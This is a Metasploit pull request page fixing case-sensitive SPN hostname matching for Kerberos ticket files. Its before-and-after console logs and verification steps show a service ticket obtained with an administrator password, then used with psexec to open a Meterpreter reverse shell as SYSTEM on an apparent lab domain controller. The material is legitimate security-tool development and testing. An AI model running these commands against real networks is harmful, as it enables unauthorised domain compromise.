Kerberos ticket lookup fix #19835
Merged
Kerberos ticket lookup fix #19835
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jheysel-r7
approved these changes
Jan 28, 2025
There was a problem hiding this comment.
Thanks for the fix @cdelafuente-r7, looks good.
Before
Create ticket (upper case)
msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use admin/kerberos/get_ticket
[*] Using action GET_TGT - view all 3 actions with the show actions command
msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhost=172.16.199.200 username=Administrator password=N0tpassword! domain=kerberos.issue spn=cifs/DC2.KERBEROS.ISSUE
[*] Running module against 172.16.199.200
[+] 172.16.199.200:88 - Received a valid TGT-Response
[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250128123907_default_172.16.199.200_mit.kerberos.cca_171181.bin
[*] 172.16.199.200:88 - Getting TGS for Administrator@kerberos.issue (SPN: cifs/DC2.KERBEROS.ISSUE)
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250128123907_default_172.16.199.200_mit.kerberos.cca_946804.bin
[+] 172.16.199.200:88 - Received a valid delegation TGS-Response
[*] Auxiliary module execution completed
psexec with lowercase domain, Failed to load a useable credential:
msf6 auxiliary(admin/kerberos/get_ticket) > use windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run lhost=172.16.199.1 rhost=172.16.199.200 username=Administrator smb::auth=kerberos smb::rhostname=dc2.kerberos.issue domaincontrollerrhost=172.16.199.200 SMB::Krb5Ccname=/Users/jheysel/.msf4/loot/20250128123907_default_172.16.199.200_mit.kerberos.cca_946804.bin
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.200:445 - Connecting to the server...
[*] 172.16.199.200:445 - Authenticating to 172.16.199.200:445 as user 'Administrator'...
[-] 172.16.199.200:445 - Exploit failed: Rex::Proto::Kerberos::Model::Error::KerberosError Failed to load a usable credential from ticket file: /Users/jheysel/.msf4/loot/20250128123907_default_172.16.199.200_mit.kerberos.cca_946804.bin
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) >
After
Create ticket (upper case)
msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhost=172.16.199.200 username=Administrator password=N0tpassword! domain=kerberos.issue spn=cifs/DC2.KERBEROS.ISSUE
[*] Running module against 172.16.199.200
[+] 172.16.199.200:88 - Received a valid TGT-Response
[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250128124341_default_172.16.199.200_mit.kerberos.cca_302550.bin
[*] 172.16.199.200:88 - Getting TGS for Administrator@kerberos.issue (SPN: cifs/DC2.KERBEROS.ISSUE)
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250128124342_default_172.16.199.200_mit.kerberos.cca_200626.bin
[+] 172.16.199.200:88 - Received a valid delegation TGS-Response
[*] Auxiliary module execution completed
psexec with lowercase domain, works 🎉
msf6 exploit(windows/smb/psexec) > run lhost=172.16.199.1 rhost=172.16.199.200 username=Administrator smb::auth=kerberos smb::rhostname=dc2.kerberos.issue domaincontrollerrhost=172.16.199.200 domain=kerberos.issue SMB::Krb5Ccname=/Users/jheysel/.msf4/loot/20250128124342_default_172.16.199.200_mit.kerberos.cca_200626.bin
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.200:445 - Connecting to the server...
[*] 172.16.199.200:445 - Authenticating to 172.16.199.200:445|kerberos.issue as user 'Administrator'...
[*] 172.16.199.200:445 - Loaded a credential from ticket file: /Users/jheysel/.msf4/loot/20250128124342_default_172.16.199.200_mit.kerberos.cca_200626.bin
[*] 172.16.199.200:445 - Executing the payload...
[+] 172.16.199.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 172.16.199.200
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.200:57237) at 2025-01-28 12:52:28 -0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DC2
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : KERBEROS
Logged On Users : 9
Meterpreter : x86/windows
meterpreter >
Release NotesThis fixes an issue in the lookup logic when providing a Kerberos ticket as a file. The comparison of the SPN hostname was done as a case sensitive comparison, which prevented the ticket to be used if the user sets the *::rhostname option with a different case than the one stored in the ticket. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR fixes an issue in the lookup logic when providing a Kerberos ticket as a file. The comparison of the SPN hostname was done case sensitive, which prevents the ticket to be used if the user sets the
*::rhostnameoption with a different case than the one stored in the ticket.Verification
First, generate a service ticket using uppercase SPN hostname for the CIFS service.
msfconsoleuse admin/kerberos/get_ticketrun action=GET_TGS rhost=<remote host> username=<username> password=<passord> domain=<FQ domain name> spn=cifs/<HOSTNAME>.<FQ domain name>Use
windows/smb/psexecto verify the ticket is correctly picked up when thesmb::rhostnameoption is set in lowercase.use windows/smb/psexecrun lhost=<local host> rhost=<remote host> username=<username> smb::auth=kerberos smb::rhostname=<hostname>.<FQ domain name> domaincontrollerrhost=<DC IP> domain=<FQ domain name> SMB::Krb5Ccname=<path of the service ticket generated before>Scenarios
Get the Kerberos service ticket with
spn=cifs/DC01.newlab.local(uppercase)Before this fix
Using
smb::rhostname=dc01.newlab.local(lowercase)After this fix
Using
smb::rhostname=dc01.newlab.local(lowercase)